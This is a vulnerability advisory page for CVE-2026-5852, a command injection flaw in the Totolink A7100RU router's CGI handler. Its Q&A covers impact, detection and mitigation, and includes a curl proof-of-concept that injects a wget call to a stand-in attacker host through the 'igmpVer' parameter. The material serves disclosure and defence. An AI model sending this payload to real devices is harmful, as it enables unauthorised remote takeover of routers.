CVE-2026-5852
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-09
Last updated on: 2026-04-09
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify how the CVE-2026-5852 vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.
Can you explain this vulnerability to me?
CVE-2026-5852 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI script cstecgi.cgi, specifically in the function that processes the "igmpVer" parameter. This parameter is used to build a command string that is executed by the system without proper sanitization, allowing an attacker to remotely execute arbitrary operating system commands on the device.
An attacker can exploit this by sending a crafted POST request to the /cgi-bin/cstecgi.cgi endpoint with a malicious "igmpVer" value, which gets executed on the router. For example, the attacker can run commands like downloading files from a remote server.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary system commands on the affected router without any authentication. This can lead to full compromise of the device, including unauthorized access, control over network traffic, installation of malware, or use of the router as a pivot point for further attacks within the network.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests to the /cgi-bin/cstecgi.cgi endpoint, specifically those containing the "igmpVer" parameter with unusual or command-like values.
A practical detection method is to capture and analyze HTTP traffic for requests that include payloads attempting to inject commands, such as those containing wget or other shell commands in the "igmpVer" parameter.
Example command to detect such attempts using tcpdump on a network monitoring system:
- tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i 'igmpVer'
Alternatively, using curl or similar tools to test the vulnerability by sending crafted POST requests with the "igmpVer" parameter set to a command can confirm if the system is vulnerable.
- curl -X POST http://[router-ip]/cgi-bin/cstecgi.cgi -H 'X-Requested-With: XMLHttpRequest' -d '{"igmpVer":"wget http://attacker-ip/testpoc"}'
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable CGI endpoint (/cgi-bin/cstecgi.cgi) by implementing firewall rules or access control lists to limit requests only to trusted sources.
Disabling remote management features on the affected Totolink A7100RU router can reduce exposure to remote exploitation.
Monitor network traffic for suspicious POST requests targeting the "igmpVer" parameter and block or alert on such activity.
If available, apply firmware updates or patches provided by the vendor that address this command injection vulnerability.
As a temporary workaround, consider disabling or restricting the CGI Handler component if it is not essential for router operation.